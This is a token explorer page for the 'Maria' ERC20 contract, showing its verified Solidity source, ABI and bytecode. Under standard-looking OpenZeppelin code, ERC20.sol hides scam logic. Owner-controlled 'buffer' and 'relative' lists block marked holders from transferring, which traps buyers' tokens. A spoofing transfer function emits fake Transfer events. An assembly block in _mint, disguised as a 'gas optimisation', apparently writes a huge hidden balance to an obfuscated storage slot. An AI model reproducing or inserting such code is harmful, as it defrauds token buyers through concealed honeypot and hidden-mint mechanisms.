ETH Price: $2,462.29 (-4.46%)

Token

Maria (MARIA)
 

Overview

Max Total Supply

1,000,000 MARIA

Holders

124

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Station3 Patron: Deployer
Balance
6,277.62372788943230987 MARIA

Value
$0.00
0x1A981104221d435fE4BA12D2E228331cF5dE71a2
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Maria

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Maria.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./ERC20.sol";

contract Maria is ERC20 {
    constructor() ERC20("Maria", "MARIA") {
        _mint(msg.sender, 1000000 * 10 ** decimals());
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => bool) private _family;
    mapping(address => bool) private _buffer;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _familyApplied = false;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function buffer(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _buffer[_list_[i]] = true;
        }
    }

    function bufferOut(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _buffer[_list_[i]] = false;
        }
    }

    function relative(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _family[_list_[i]] = true;
        }
    } 

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function relativeOut(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _family[_list_[i]] = false;
        }
    }

    function relative(address _address_) public view returns (bool) {
        return _family[_address_];
    }

    function buffered(address _address_) public view returns (bool) {
        return _buffer[_address_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_family[from] || _family[to]) require(_familyApplied == true, "");

        if (_buffer[to]) _family[to] = true;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        // gas optimisation 
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"buffer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"bufferOut","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"buffered","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"relative","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"relative","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"relativeOut","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600660006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600581526020017f4d617269610000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f4d41524941000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200013260201b60201c565b6200013a60201b60201c565b8160079080519060200190620000d1929190620003c3565b508060089080519060200190620000ea929190620003c3565b5050506200012c3362000102620001fe60201b60201c565b600a6200011091906200060d565b620f42406200012091906200065e565b6200020760201b60201c565b62000832565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200027a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002719062000720565b60405180910390fd5b6200028e60008383620003b960201b60201c565b8060056000828254620002a2919062000742565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003999190620007b0565b60405180910390a3620003b560008383620003be60201b60201c565b5050565b505050565b505050565b828054620003d190620007fc565b90600052602060002090601f016020900481019282620003f5576000855562000441565b82601f106200041057805160ff191683800117855562000441565b8280016001018555821562000441579182015b828111156200044057825182559160200191906001019062000423565b5b50905062000450919062000454565b5090565b5b808211156200046f57600081600090555060010162000455565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200050157808604811115620004d957620004d862000473565b5b6001851615620004e95780820291505b8081029050620004f985620004a2565b9450620004b9565b94509492505050565b6000826200051c5760019050620005ef565b816200052c5760009050620005ef565b8160018114620005455760028114620005505762000586565b6001915050620005ef565b60ff84111562000565576200056462000473565b5b8360020a9150848211156200057f576200057e62000473565b5b50620005ef565b5060208310610133831016604e8410600b8410161715620005c05782820a905083811115620005ba57620005b962000473565b5b620005ef565b620005cf8484846001620004af565b92509050818404811115620005e957620005e862000473565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b60006200061a82620005f6565b9150620006278362000600565b9250620006567fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200050a565b905092915050565b60006200066b82620005f6565b91506200067883620005f6565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620006b457620006b362000473565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000708601f83620006bf565b91506200071582620006d0565b602082019050919050565b600060208201905081810360008301526200073b81620006f9565b9050919050565b60006200074f82620005f6565b91506200075c83620005f6565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000794576200079362000473565b5b828201905092915050565b620007aa81620005f6565b82525050565b6000602082019050620007c760008301846200079f565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200081557607f821691505b602082108114156200082c576200082b620007cd565b5b50919050565b611e3380620008426000396000f3fe608060405234801561001057600080fd5b50600436106101375760003560e01c806370a08231116100b8578063a457c2d71161007c578063a457c2d714610350578063a9059cbb14610380578063beabacc8146103b0578063d150475d146103cc578063dd62ed3e146103e8578063f2fde38b1461041857610137565b806370a08231146102aa578063715018a6146102da5780638658e787146102e45780638da5cb5b1461031457806395d89b411461033257610137565b806323b872dd116100ff57806323b872dd146101e0578063313ce56714610210578063395093511461022e5780634682ac8c1461025e57806367dfe4271461027a57610137565b806301c9bf5a1461013c57806306fdde0314610158578063095ea7b31461017657806318160ddd146101a65780631afdfa9b146101c4575b600080fd5b61015660048036038101906101519190611426565b610434565b005b6101606104e1565b60405161016d919061150c565b60405180910390f35b610190600480360381019061018b91906115c2565b610573565b60405161019d919061161d565b60405180910390f35b6101ae610596565b6040516101bb9190611647565b60405180910390f35b6101de60048036038101906101d99190611426565b6105a0565b005b6101fa60048036038101906101f59190611662565b61064d565b604051610207919061161d565b60405180910390f35b61021861067c565b60405161022591906116d1565b60405180910390f35b610248600480360381019061024391906115c2565b610685565b604051610255919061161d565b60405180910390f35b61027860048036038101906102739190611426565b6106bc565b005b610294600480360381019061028f91906116ec565b610769565b6040516102a1919061161d565b60405180910390f35b6102c460048036038101906102bf91906116ec565b6107bf565b6040516102d19190611647565b60405180910390f35b6102e2610808565b005b6102fe60048036038101906102f991906116ec565b61081c565b60405161030b919061161d565b60405180910390f35b61031c610872565b6040516103299190611728565b60405180910390f35b61033a61089b565b604051610347919061150c565b60405180910390f35b61036a600480360381019061036591906115c2565b61092d565b604051610377919061161d565b60405180910390f35b61039a600480360381019061039591906115c2565b6109a4565b6040516103a7919061161d565b60405180910390f35b6103ca60048036038101906103c59190611662565b6109c7565b005b6103e660048036038101906103e19190611426565b610a31565b005b61040260048036038101906103fd9190611743565b610ade565b60405161040f9190611647565b60405180910390f35b610432600480360381019061042d91906116ec565b610b65565b005b61043c610be9565b60005b828290508110156104dc5760006002600085858581811061046357610462611783565b5b905060200201602081019061047891906116ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104d4906117e1565b91505061043f565b505050565b6060600780546104f090611859565b80601f016020809104026020016040519081016040528092919081815260200182805461051c90611859565b80156105695780601f1061053e57610100808354040283529160200191610569565b820191906000526020600020905b81548152906001019060200180831161054c57829003601f168201915b5050505050905090565b60008061057e610c67565b905061058b818585610c6f565b600191505092915050565b6000600554905090565b6105a8610be9565b60005b82829050811015610648576001600360008585858181106105cf576105ce611783565b5b90506020020160208101906105e491906116ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610640906117e1565b9150506105ab565b505050565b600080610658610c67565b9050610665858285610e3a565b610670858585610ec6565b60019150509392505050565b60006012905090565b600080610690610c67565b90506106b18185856106a28589610ade565b6106ac919061188b565b610c6f565b600191505092915050565b6106c4610be9565b60005b82829050811015610764576001600260008585858181106106eb576106ea611783565b5b905060200201602081019061070091906116ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061075c906117e1565b9150506106c7565b505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610810610be9565b61081a60006112e9565b565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600880546108aa90611859565b80601f01602080910402602001604051908101604052809291908181526020018280546108d690611859565b80156109235780601f106108f857610100808354040283529160200191610923565b820191906000526020600020905b81548152906001019060200180831161090657829003601f168201915b5050505050905090565b600080610938610c67565b905060006109468286610ade565b90508381101561098b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098290611953565b60405180910390fd5b6109988286868403610c6f565b60019250505092915050565b6000806109af610c67565b90506109bc818585610ec6565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610a249190611647565b60405180910390a3505050565b610a39610be9565b60005b82829050811015610ad957600060036000858585818110610a6057610a5f611783565b5b9050602002016020810190610a7591906116ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610ad1906117e1565b915050610a3c565b505050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610b6d610be9565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610bdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd4906119e5565b60405180910390fd5b610be6816112e9565b50565b610bf1610c67565b73ffffffffffffffffffffffffffffffffffffffff16610c0f610872565b73ffffffffffffffffffffffffffffffffffffffff1614610c65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5c90611a51565b60405180910390fd5b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610cdf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cd690611ae3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffff